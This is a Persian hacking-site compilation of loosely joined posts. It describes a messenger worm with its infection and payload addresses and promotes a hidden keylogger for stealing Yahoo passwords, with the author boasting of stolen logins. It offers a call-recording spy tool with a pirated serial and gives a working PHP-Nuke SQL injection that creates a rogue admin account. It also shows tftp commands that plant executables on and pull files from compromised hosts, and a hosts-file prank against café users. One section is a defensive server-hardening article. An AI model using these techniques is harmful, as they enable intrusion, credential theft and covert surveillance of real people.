توضیحاتی درباره ویروس و نحوه انتشار
این ویروس در واقع نوعی کرم اینترنتی هست به نام W32.Imaut.A که از خطر کمی برخوردار می باشد ولی در عین حال برای دوستان مشکلاتی را به وجود می آورد که من بعضی از آن ها رو ذکر می کنم :
۱) قفل کردن Home Page روی صفحه ی آلوده
2) قفل کردن رجیستری
3) قفل کردن Task Manager
۴) ایجاد مشکل در لاگین شدن یاهو مسنجر
۵) ارسال لینک صفحه ی آلوده از طریق پیام توسط یاهو مسنجر و AOL به اد لیستتان برای انتشار خود با پیام های زیر :
که این لینک به شکل زیر است :
[http://]concerto4.net/?id=[RANDOM_TEXT]
۶) قفل کردن تایمری صفحه ی وبی که شما قبل از باز کردن صفحه ی آلوده به ویروس در آن قرار داشتید . به این معنا که با مراجعه به آن صفحه و لود شدن کامل صفحه شما پس از چند ثانیه به صفحه ی ویروسی منتقل می شوید .
۷) ممکن است ورژن جدید خود را از آدرس [http://]64.141.110.32/ene[REMOVED] دانلود کند .
نحوه ی انتشار :
لینک این کرم از طریق یاهو مسنجر منتشر می شود . در واقع این کرم لینک خود را به اد لیست افراد ارسال می کند .
با لود شدن صفحه ی آلوده کرم بدون هیچ گونه تاییدی از طرف کاربر به محض لود شدن صفحه توسط اجرای کد های VBscript وارد رایانه شخص می شود . و با ساخت کلید هایی در رجیستری تغییراتی در Home Page و یاهو مسنجر و Start Up ویندوز ایجاد می کند و همچنین Task Manager و رجیستری ویندوز را از کار می اندازد .
حملات توسط برنامه های وب بسیار خطرناک هستند و می توانند در نفوذ به سرور ها و سایت ها به ما کمک کنند.دانستن این که این حملات چگونه رخ می دهند و چگونه می توانیم از آن ها استفاده کنیم می تواند بسیار به ما کمک کند.در چند مقاله شما را با این حملات آشنا می کنیم.امیدوارم که از مقالات در جهت درست استفاده کنید.این مقالات را می توانید از لینک های زیر دریافت کنید:
Introduction to Authentication Hacking attack by Siahacker
Introdution to CRLF injection by Siahacker
Introdution to Cross site Scripting by Siahacker
با سلام خدمت تمامی بازدیدکنندگان محترم:
اکسپلویت های زیادی با نام های متفاوت ارایه می شوند که هر یک کاربرد خاصی دارند.به همین دلیل باید بدانیم که چه اکسپلویتی کجا به کار ما خواهد آمد.در مقاله ای در همین رابطه توضیحی در مورد انواع اکسپلویت ها داده شده است که می توانید از لینک زیر آن را دانلود کنید:
رييس دانشگاه علمي كاربردي پيام شهركرد گفت:" هكرهاي" رايانهاي جهان به هيچ عنوان توان نفوذ به سيستم نرمافزاري " لينوكس فارسي" را ندارند.
به گزارش آژانس خبری پرشین هک از ايرنا سيد جلال حسينيان در نشست با خبرنگاران استان چهار محال و بختياري در دانشگاه علمي كاربردي شهركرد افزود: سيستم لينوكس فارسي از ضريبامنيت و اطمينان بسيار بالايي برخوردار است و كدهاي آن بهگونهاي طراحي شده است كه قابل نفوذ براي هكرها نباشد. به گفته وي، از ديگر ويژگيهاي اين سيستم بالا بودن سرعت و بومي بودن آن است كه موجب افزايش ضريب امنيت سيستم ميشود.
دبير"همايش نرمافزارهاي آزاد، متن باز و لينوكس فارسي" افزود: برنامههاي اين سيستم بر اساس نيازهاي كاربران نوشته ميشود.
اين متخصص نرمافزار گفت: به دليل اين كه سيستم مذكور مختص ايران ميباشد و سرور (دستگاه پردازشگر مركزي)آن در كشور نصب شده است، امكان نفوذ پذيري آن در سطح بينالمللي به حد صفر ميرسد.
به گفته وي، اين سيستم در راهاندازي"اينترنت ملي"نقش مهمي ايفا ميكند و در صورت قطع اينترنت، سيستم لينوكس فارسي پس از متصل شدن، به صورت خودكار فعال خواهد شد.
دبير "همايش نرمافزارهاي آزاد متن باز و لينوكس فارسي" گفت: با توجه به اينكه ايران عضو ناظر سازمان تجارت جهاني است، از اين پس بايد قانون "كپي رايت " را رعايت كند بخصوص اينكه نصب سيستم نرمافزاري "ويندوز" براي كشور هزينه بسيار بالايي را به همراه خواهد داشت.
حسينيان اظهار داشت: نصب سيستم "ويندوز" روي هر دستگاه رايانهاي دولتي و اداري يكصد دلار براي ايران هزينه دارد و موجب خروج ارز از كشور ميشود.
به گفته وي، سيستم نرمافزاري "لينوكس فارسي" قابليت نصب روي تمامي رايانههاي خانگي را دارد.
دبير همايش"لينوكس فارسي" گفت: اين سيستم از سال ۸۲از سوي گروه فناوري اطلاعات دانشگاه صنعتي شريف در كشور طراحي شد و پيش بيني ميشود ، تا سال آينده اين سيستم در تمامي كشور فعال شود.
حسينيان تاكيد كرد: تمامي سيستمهاي نرمافزاري كشور تا پايان سال ۸۶به صورت كامل فارسي خواهند شد.
وي يادآور شد: نخستين همايش "لينوكس فارسي" ۱۰خردادماه امسال در مجتمع فرهنگي هنري "غدير" شهركرد با همكاري شوراي عالي انفورماتيك و شوراي عالي اطلاع رساني برگزار خواهد شد.
در زمان حاضر اكثر دستگاههاي دولتي در استان چهار محال و بختياري از برنامههاي نرمافزاري"ويندوز "۹۸و " ويندوز "xpروي سرورهاي خود استفاده ميكنند.
اين برنامه تمامي کليد ها و تمامي کار هايي را که کاربر انجام مي دهد در يک فايل ذخيره مي کند و شما با خواندن آن فايل مي توانيد به تمامي پسورد ها و يوزر نيم ها وتمامي سايت هايي که ديده و تمامي کار هايي را که انجام داده را بفهميد.
اين برنامه توسط هيچ نوع آنتي ويروسي حتي آنتي ويروس هاي قوي و به روز شده نيز قابل شناسايي نيست.
اين برنامه نياز به نصب ندارد و بعد از کليک بر روي آن تا هميشه کار مي کند.براي اطمينان بيشتر و براي اينکه کسي نفهمد که شا اين برنامه را اجرا کرده ايد، ابتدا برنامه را در يک جاي مخفي کامپيوتر يا يه جاي دنج کپي کنيد و بعد اون را اجرا کنيد.
اين برنامه تمامي نتايج بدست اومده خودش رو فقط و فقط بر روي يکي از درايو ها ذخيره مي کنه و هيچ فايل يا اطلاعات ديگر را به جايي نمي فرسته.{محل ذخيره کردن فايل اين برنامه C:\Temp\Sammoddhr.ary است.که mo ماه و dd روز و hr ساعت اجراي برنامه است.sam يه اسميه که خيلي تابلو نشه و .ary نيز مختصر اسم خودم است.}
اين برنامه قابليت تشخيص کليد هاي بزگ و کوچک و همچنين تشخيص کاراکتر هاي خاص مثل !@#$%^&*)( و فاصله را نيز دارد.
براي حذف اين برنامه در ويندوز ايکس پي در منوي استارت به قسمت RUN برويد و در اين قسمت کلمه MSConfig را بنويسيد و به بعد از اينکه برنامه System Configuration Utility اجرا شد به قسمت Startup برويد و تيک برنامه هاي SysRun را برداريد.(اکثر برنامه هايي که در اين قسمت هستند احتمال دارد که ويروس باشند.)
بعد از اين که اين برنامه را اجرا کرديد برنامه به طور مخفي اجرا مي شود و با هر بار اجراي ويندوز نيز اجرا مي شود.
تشخيص کليد هاي فشرده شده :
اين برنامه کليدهاي معمولي را به صورت عادي مي نويسد.کليد هاي معمولي مثل ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_+~?><":}{|/.,';][\`
کليد هاي خاص را نيز به صورت {home} {Delete} يا به طور کلي {اسم کليد} مي نويسد.
تشخيص سايت هاي بازديد شده :
اين برنامه تمامي سايت هايي را که کاربر مشاهده کرده و تمامي برنامه هايي که اجرا کرده و تمامي کارهايي را که انجام داده مينويسد.طريقه نوشتن هم به اين صورت است که {Win==>page Title} که Page Title همان عنوان صفحه است.مثلاً {Win==>Windows Task Manager} نشان مي دهد که کاربر تسک منيجر ويندوز را اجرا کرده است.يا مثلا {Win==>Start Menu} نشنا مي دهد که کاربر بر روي دکمه استارت کليک کرده است.{Win==>Yahoo! Messenger - Invisible} نشان مي دهد که کاربر به صورت مخفي مي خواهد وارد ياهو شود است.{Win==>Sign In} نشان مي دهد که کاربر وارد صفحه ورود سايت يا برنامه اي شده و مي خواهد پسورد خود را پيدا کند.
طريقه بدست آوردن پسورد ياهو مسنجر با استفاده از اين برنامه:
بدست آوردن پسورد ياهو مسنجر تنها يکي از صد ها کاربرد اين برنامه است.براي بدست آوردن پسورد ياهو اول فايلي که توسط اين برنامه ساخته شده را با برنامه نوتپد باز مي کنيم.{براي باز کردن فايل به نشاني C:\Temp\Sammoddhr.ary برويد.که mo ماه و dd روز و hr ساعت اجراي برنامه است.sam يه اسميه که خيلي تابلو نشه و .ary نيز مختصر اسم خودم است.}{براي اجراي برنامه نوتپد به منوي استارت برويد و در آنجا گزينه Run را اجرا کنيد و در کادر روبرو کلمه Notepad را بنويسيد.}
بعد از باز کردن فايل برنامه دنبال کلمه {Win==>Sign In} بگرديد{براي جستجو در نوتپد به منوي Edit>Find برويد يا دکمه هاي CTRL+F را فشار بدهيد.}اين محلي است که کاربر يوزر نيم پسورد خود را مي نويسد.معمولاً کلمه اي که بعد از {Win==>Sign In} مي آيد يوزرنيم است.و کاربر بعد از اينکه اسم خود را مي نويسد دکمه {Tab} رافشار مي دهد و سپس پسورد خود را مي نويسد.بعد از اينکه يوزر نيم و پسورد نفر اول را پيدا کرديد.باز هم اين کار را انجام دهيد تا يوزر نيم ها و پسورد هاي ديگر را نيز بدست آوريد.
من خودم با همين برنامه يه روز 9 تا و روز بعد 12 تا يوزر نيم و پسورد پيدا کردم.البته روز بعد ديگه اين برنامه را حذف کردم.
همونطور که گفتم اين برنامه ميتونه حرف هايي که داخل چت هم گفته ميشه رو يادداشت کنه.براي اين کار به دنبال يوزرنيم مورد نظر مي گرديم و بعد از اون مي تونيم حرف هاش رو ببينيم.
برنامه Modem spy چندين كار مهم را انجام مي دهد
1- پيدا كردن شماره تلفن كسي كه با وي چت مي كنيم
2- ظبط مكالماتي كه از تلفن صورت مي گيرد
3- نمايش دادن شماره تلفن شخصي كه به شما تماس مي گيرد(Caller ID)
هر كس اين برنامه را مي خواهد اينجا را كليك كند.
اينم رجيستر نامبرش :
Name: modemspy
SN: 14458
خوب حالا روش كار با نرم افزار:
بعد از دريافت و اجراي نرم افزار يك شمايل كوچك در نوار وظيفه ويندوز
مشاهده مي نماييد. كه براي دسترسي به ترم افزار مي توانيد روي آن كليك
كنيد.
ابتدا تنظيمات مربوط به نرم افزار:
روي منوي فايل كليك كرده و گزينه Preferences را انتخاب نماييد. سپس
زبانه Harware را انتخاب نماييد و در آنجا مودم خود را براي نرم افزار مشخص
نماييد. همچنين تيك هر دو گزينه را بزنيد و در پايين اين دو گزينه كارت صوتي
خود را براي نرم افزار مشخص نماييد.حال به سراغ تب Recording برويد اگر
بخواهيد تمامي مكالماتي كه با شما تماس گرفته مي شود را ظبط كنيد بايد
تيك مربوط به گزينه Record all incoming calls را بزنيد در قسمت Answer
a call in seconds نيز در جاي خالي بايد مدت زماني را كه براي فعال شدن
برنامه وقتي كه كسي با شما تماس مي گيرد براي ظبط مكالمات مي باشد
را وارد نماييد كه بهتر است زمان 10 ثانيه باشد. اگر بخواهيد كه شما
مكالماتي كه با ديگران تماس مي گيريد را ظبط كنيد بايد تيك مربوط به گزينه
Record all outcalling … را علامت بزنيد.البته اگر اين تيك فعال باشد برنامه
هر 30ثانيه خط تلفن را براي شناساي اينكه كسي صحبت مي كند يا نه چك
مي نمايد. براي تغيير اين زمان مي توانيد در قسمت Check for dial tone
زمان مربوطه را وارد نماييد.
حال تب Save as را انتخاب نماييد.در قسمت Change format مي توانيد
فرمت مناسب براي ظبط مكالمات را انتخاب نماييد
در قسمت Advanced نيز هيچ گونه تغييري ندهيد در انتها گزينه Apply را
كليك كنيد.
حال دوباره به صفحه اصلي برنامه بر مي گرديم.در قسمت Input device
گزينه Modem و در قسمت Outpout device نيز Sound carad را انتخاب
نماييد و هر دو تيك كنار آنها را علامت بزنيد در پايين نرم افزار نيز تيك Record
all incoming calls را نيز علامت بزنيد. خوب تمام شد. اين نرم افزار به
شرطي كا مي كند كه مودم شما از قابليتهايي كه اين نرم افزار دارد و در بالا
معرفي شد پشتيباني كند اگر بعد از نصب نرم افزر با پيغام خطايي مواجه
شديد يعني مودم شما از اين قابليتها پشتيباني نمي كند
حالا فقط کافيه برنامه باز باشه .
اما چگونه هنگام چت شماره تلفن طرف رو پيدا کنيم:
برای اينکار شما بايد اول اين فايل پلاگين رو از اينجا دانلود کنيد.
در مرحله بعد اين فايل رو در پوشه plugin در مکانی که نرم افزار نصب شده
کپی کنيد.
حالا ازمنو plugin در بالای نرم افزار گزينه networking را فعال کنيد ( معمولا
خودش فعاله اما کار از محکم کاری عيب نميکنی) توجه کنيد هيچکدام از
تنضيمات آن را تغيير ندهيد . حالا کافيست نرم افزار باز باشد خود نرم افزار به
صورت خودکار شماره طرف رو بهتون نشون ميده .
حالا فقط کافيه برنامه باز باشه .
modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid%2c1%2cpwd%2c1%20FROM%20nu ke_authors%20/%2a
این کد ها رو باید در اخر اسم سایت کپی کنید ، باید حواستون هم باشه که PHP تو کدوم شاخه نصب شده. مثلا :
http://www.Site.com/modules.php?nam..._authors%20/%2a
حالا اگه مثلا تو پوشه nuke نصب شده بود اینجور میشد:
http://www.site.com/nuke/modules.ph..._authors%20/%2a
بعد از اینکارا اگه سایت پچ نشده باشه ( که خدا رو شکر همه اکثرن شدن ) به شما یه یوزر ادمین با یه پسورد هش ( MD5 ) میده . شما باید اون هش رو اینکد کنید.با Base64 که تو قسمت دانلود هست ، دانلود کنید.به این صورت اینکد کنید:
Admin:hash:
بعد که پسورد رو اینکد کردید میرید تو ادرس بار اینو مینویسید:
www.site.com/admin.php?admin=code
به جای admin یوزر نیم و به جای Code پسورد هش رو که اینکد کردید بذارید . میبینید که وارد منوی مدیریت میشید. حالا بعد از اینجا شما 2 راه دارید ، یکی اینکه شما با همین ادمین تغییراتی رو که میخواهید ایجاد کنید ، راه دوم هم اینه که واسه خودتون یه ادمین بسازید.
راه اول:
این راه اسون تر از راه دوم هست. وقتی وارد منو مدیر سایت شدید کافیه که بعد از کلیک کردن در هر لینک این رو بعد از لینک تو ادرس بار کپی کنید:
&admin=Code
به جای کد پسورد اینکد شده رو بذارید.
راه دوم :
این راه از اولی یکم سختره. شما باید یه مدیر بسازید ، این ادرس رو کپی کنید بعد از اسم سایت:
admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid
=$nick&add_email=hacker@hacker.com&add_pwd=$pass&admin=$hash";
به جای $nick ها اسم یوزری که میخواهید بسازید رو بدید. به جای $pass هم پسوردی که میخواهید بذارید واسه ادمینتون بذارید.به جای $hash هم پسورد اینکد شده رو بذارید. بعد اینتر کنید اگه موفق شده باشید وارد صفحه لاگین کردن مدیر میشد ، یوزر و پسوردی رو که ساختید لاگین کنید.
وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftp که از اینجا میتونید داونلودش کنید در سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
خوب برای شروع این کار بعد از DowanloadکردنTftpاز اینجا فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد
می تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجا و ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe
خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful
حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم
tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش
این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید
برای ارسال: Tftp -i 62.32.45.67 get server.exe
برای دریافت: Tftp -i 62.32.45.67 post server.exe
دراين مقاله به بررسي برخي راهكارهايي كه مي توانيم با بكارگيري آنها خطر شناسايي را به حداقل برسانيم ، مي پردازد. بيشتر مثالها مربوط به IIS ميكروسافت مي باشد . زيرا بخاطر آسيب پذيري زيادش به طور وسيعي مورد توجه نفوذگران قرار گرفته است. همچنين يك سري از اقدامات پيشگيرانه شناسايي براي آپاچي سرور نيز ذكر خواهد شد. غير قابل شناسايي كردن سرور وظيفه همه كساني است كه مسئوليت اجرايي وب سرور را بر عهده دارند.
نفوذگران از اينجا شروع مي كنند ، چرا شما از اين نقطه شروع نمي كنيد ؟
بگذاريد از نقطه نظر مهاجمين نگاه كنيم. آسيب پذيريهاي امنيتي اتكا بر ورژن و نوع نرم افزار دارند.
يك نفوذ گر براي نفوذ به يك وب سرور بايد بداند وب سرور از چه نوعي و داراي چه ورژني مي باشد. دانستن جزئيات يك وب سرور كارآمدي هرگونه تهاجمي را به مقدار زياد افزايش مي دهد.
Server Header ها همه چيز را مي گويند:
بسياري از وب سرورها خودشان و سيستم عاملي را كه بر روي آن نصب هستند به هر كسي كه بخواهد معرفي مي نمايند. با استفاده از ابزارهای بررسي شبکه مانندSam Spade يا Header Check مي توانيد http هدرهاي سرور را تشخيص دهيد. تنها كافيست Home Page وب سايت را درخواست نموده وhttp هدرهاي حاصله يا بنرهايي كه توسط سرور ارسال گرديده را مورد بررسي قرار دهيد. در ميان آنها احتمالا چيزي شبيه به Server : Microsoft – IIS/5.0 پيدا خواهيد كرد.
آپاچي سرور نيز به صورت پيش فرض همه مشخصات را اعلام می کند.
Server : Apache/2.0.41-dev(unix)
كاربران آپاچي سرور 2.x داراي مدول Mod Header هستند . این کاربران مي توانند به سادگي فايل httpd.conf را به صورت زير اديت نمایند :
Header Set Server "New Server Name"
متاسفانه در نسخه هاي پيشين آپاچي سرور نمي توان سرور هدرها را تغيير داد.
كاربران IISنیز مي توانند Lock Down را نصب نموده و براي برداشتن وجايگزين كردن هدرها از فايل پيكره بنديURLScans استفاده نمايند. در صورتي كه از سرور Cold Fusion استفاده مي نماييد و مي خواهيد URLScans را به كار بريد بسيار محتاط باشيد. زيرا روشي كه در حال حاضر هدرها را جايگزين
مي نمايد باعث خسارات سنگيني به صفحات CFM مي گردد. در اين حالت تنها راه ممكن برداشتن هدرهاست.
پسوند فايلها :
نمايش پسوند فايلها مانند .ASP يا .ASPX به طور مشخص نشان دهنده آن است كه شما از يك سرور
ميكرو سافت استفاده مي كنيد. به طور كلي پنهان كردن پسوند فايلها كار مفيدي است. در طراحي سايتها سعي كنيد ازHTML و Java استفاده كنيد. پسوند فايلهاي طراحي شده توسط اين زبانها نشان دهنده نوع وب سرور نمي باشد.
در مورد آپاچي سرور به مدول mod negotiation توجه خاصي داشته باشيد. بوسيله اين مدول مي توانيد پسوند فايلها را مخفي كنيد. همچنين توسط mod header مي توان پسوند فايلها را تعويض نمود.
كاربران IIS نيز مي توانند از برنامه PageXChanger براي پنهان ساختن پسوند فايلها استفاده نمايند.
ASP Session ID Cookie:
اين كوكي ها وظيفه حفظ وضعيت سرويس گيرنده را بر عهده دارند و به سادگي سيستم عامل و وب سرور نصب شده بر روي آن را مشخص مي كنند.
Set –Cookie:ASPESSIONIDQGQGGWFC=MGMLNKMDENPEOPIJHPOPEPPB;
شما مي توانيد ASP Session State را از كار بيندازيد. همچنين مي توانيد براي تغيير اسامي كوكي ها از يك فيلتر ISAPI استفاده نماييد. از طرفي ASP Session ها باعث محدود شدن منابع سيستم مي گردند. از كار انداختن آن به بهبود اجرايي ASP كمك مي كند و باعث گمنام ماندن سرور شما نيز مي گردد.
WebDAV:
راه ديگر شناسايي سرورهاي ويندوزي WebDAV مي باشد. WebDAV منحصر به ميكروسافت يا IIS نمي باشد ، بلكه يك استاندارد پيشنهادي (RFC 2518) با گروه كاري IETF است. سرور ويندوزي در حالت پشتيباني WebDAV اطلاعات زيادي را به هدر مي افزايد كه مي تواند مورد استفاده هكرها قرارگيرد. در صورتيكه از WebDAV براي پشتيباني Web Folders , Outlook Web Access يا ... استفاده
نمي نماييد، مي توانيد با استفاده ازIISLockDown يا تغيير در رجيستري آن را از كار بيندازيد.
هدرهاي ديگر:
برخي از سرورهاي وب به وسيله نمايش هدرهاي خاص در پاسخهاي HTTP هويت خود را فاش
مي سازند. هدرهاي X-Powered-By و X-ASPNET-Version علائم بارزي هستند كه نشان دهنده استفاده از ASP.NET و بنابراين ميزباني IIS مي باشند. همچنين به ياد داشته هدرهاي
Microsoft Office Web Server را بايد مخفي كنيد.
Windows Authentication:
كاربران IIS نبايد Windows Authentication را به عنوان راهي براي پنهان نمودن اطلاعات بر روي سرور مورد استفاده قرار دهند. زيرا اين شيوه اطلاعات زيادي را در مورد سرور بر ملا مي سازد. يك هكر
مي تواند با توجه به هدرهاي Authentication WW- نوع وب سرور را مشخص نمايد. زماني كه يك فايل يا فلدر توسط پروسه Authentication ويندوز محافظت مي شود، درهدرهاي فرستاده شده از طرف سرور String NTLM وجود دارد كه مي تواند مورد بهره برداري هكر قرار گيرد.
پيام هاي پيش فرض:
پيامها ، صفحات و اسكريپتهاي پيش فرض نيز باعث شناسايي وب سرور مي گردد. اغلب نرم افزارهاي پشتيباني كننده وب سرور داراي پيغامهاي پيش فرض هستند كه بايد به گونه اي مناسب تغيير پيدا كند. همچنين تمام Administration Pages ، اسكريپتها وDocument هايي كه همراه با وب سرور نصب مي شوند بايد مخفي يا پاك شوند.
ديگر سرويسها:
بسياري از کامپیوترهایی كه با عنوان وب سرور استفاده مي شوند ، جدا از خدمات HTTP خدمات ديگري مانند SMTP و FTP را ارائه مي دهند. به عنوان يك قانون امنيتي سعي كنيد چنين سرويسهايي را در وب سرور خود راه اندازي نكنيد. به ويژه از سرويسهاي پيش فرض FTP و SMTP در ميكرو سافت IIS اجتناب كنيد. زماني كه يك ارتباط با سرويس SMTP برقرار مي گردد. يك پيغام خوشامد گويي براي Client فرستاده مي شود. اين پيغام هيچ تاثيري در سرويس ايميل ندارد. اما مشابه هدرهاي HTTP اطلاعاتي را در مورد وب سرور بر ملا مي سازند. سرويس پيش فرض SMTP ويندوز چنين اطلاعاتي را نمايان مي سازد . همچنين سرور پيش فرض IIS FTP يك بنر شناخته شده را ارائه مي دهد . از آنجايي كه اصلاح اين بنر از اصلاح بنر SMTP پروسه پيچيده تري است بهترين راه جايگزيني آن با يك FTP سرور ديگر مانند RhinoSoft's Serv-U FTP Serverاست . كه بتوان هرگونه پيغامي را در بنر FTP نمايش داد. همچنين اين FTP سرور داراي امتيازات ديگري نيز از نظر ايمني مي باشد.
ورودهاي غير مجاز :
بسياري از Exploits ها از يك URL پيچيده براي گرفتن شل (Shell ) يا كنترل يك CGI Program استفاده ميكنند كه هكر بوسيله آنها مي تواند ليستي از فايلها سيستم عامل را بدست آورد. بهترين روش براي مقابله با اينگونه حملات استفاده از يك فيلتر داده مي باشد كه كاراكترهاي غير قابل قبول مثل متا كاراكترها را از اطلاعاتی که توسط كاربر وارد می شود حذف نمايد. براي IIS استاندارد جاري IISLockDown/URL Scan است. نسل جديدي از Firewall ها نيز قابليت پشتيباني از لايه هاي كاربردي Web Server را دارا هستند.
پشته ها:
حتي زمانيكه علائم افشاگرانه از روي لايه كاربردي وب سرور حذف شد ، بر روي لايه هاي پايين تر شبكه نقاط ضعف آشكارسازي باقي مي ماند. هر سروري با يك اتصال شبكه داراي يك Network Protocol است كه قابل اسكن و شناسايي مي باشد ، بهترين اسكنرهاي پشته مانند NMAP مي تواند با استفاده از تكنيكهاي مختلف سيستم عامل را شناسايي كند. همچنين پشته IP مربوط به هر سيستم عامل نيز در مقابل شناسايي از طريق پروتوكل ICMP آسيپ پذير است. اولين راه مقابله با اين نوع آسيب پذيري ها استفاده از يك فايروال مي باشد. به اين نكته توجه داشته باشيد كه با وجود فايروال ، يك تحليل شبكه اي دقيق هنوز هم مي تواند نوع وب سرور را مشخص سازد.
Netcraft:
در سايت Netcraft با وارد نمودن URL هر وب سايت مي توان به اطلاعاتي در مورد سيستم عامل و وب سرور آن سايت بدست آورد. با تغيير دادن HTTP هدرها مي توان كاري كرد كه گزارش Netcraft اشتباه شود. همچنين با حذف HTTP هدرها ، Netcraftگزارش ناشناس بودن وب سرور را ارائه خواهد كرد.
پیش فرضهای :TCP/IP
احتمالاً هنوز سيستم عامل شما حتي از پشت يك ديوار آهنين نيز مورد شناسائي قرار خواهد گرفت. براي آنكه بتوان يك سيستم عامل را به طور كامل ناشناس كرد بايد برخي از پيش فرض هاي محيط IP/TCP مانند (Receive Window size) RWIN ، (Maximum Transmission Units) MTU ، MSS (Maximums Segment Size) ، (Time-to-Live) TTL دستكاري شود . در زمان تغيير دادن اين پيش فرض ها بسيار محتاط باشيد زيرا مي تواند تاثير معكوس بر روي وب سرور داشته و يا سيستم عامل را به طور كامل فلج سازد.
به خاطر داشته باشيد :
براي آنكه وب سرور شما كاملاً ناشناخته بماند بايد تمام مواردي كه در بالا ذكر شده است را بصورت تركيبي به كار بريد. هميشه به ياد داشته باشيد اين اقدامات پيشگيرانه تنها مي تواند باعث شكست اكثر نفوذ گران گردد نه همه آنها. يك نفوذگر ماهر و مصمم مي تواند از تمامي اين سدها عبور كند... هرگونه سوال و پیشنهادی داشتید با من تماس بگیرید.
این دفعه میخوام راههای کرم ریختن رو یادتون بدم ...
ميدونم الان ميگيد مخابرات کم فيلتر ميکنه اينم داره اموزش فيلتر کردن رو ميده خوب ميتونين اين روش رو بريد تو کا فينت بر سر يه سيستم بياريد .خوب بريد تو RUN (از طريق منوی استارت)وبعد تايپ کنيد SYSTEM32 بعد به شاخه drivers و بعد etc ميريد يه فايل به نام hosts ميبينيد اونو بوسيله notepad باز کنيد توش يه سری نوشته ميبينيد که شبيه اينه:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
به خط ها کاری نداريم ميریم اخرش سراغocalhost و اونو تغيير ميديم يعنی پاکش ميکنيم و به جاش آدر س سايتی رو که می خوايم فيلتر کنيم می نويسيم مثلا در کا فينت ها ۹۸٪ افراد به سايت يا هو ميرن تا چت کنن يا ايميلشون رو چک کنن و شما می تونين حالشون رو بگيرید به اين صورت انجام ميديم:
http://www.yahoo.com/ ۱۲۷.۰.۰.۱
در اين صورت هرکی رو اون کامپوتر بخواد به سايت ياهو بره با پیغامcannot page displayed مواجه ميشه این عمل در مورد عکس ها هم کار برد .داره موفق باشيد
راستی داشت يادم ميرفت اين روش فقط رو xp و 2003 جواب ميده.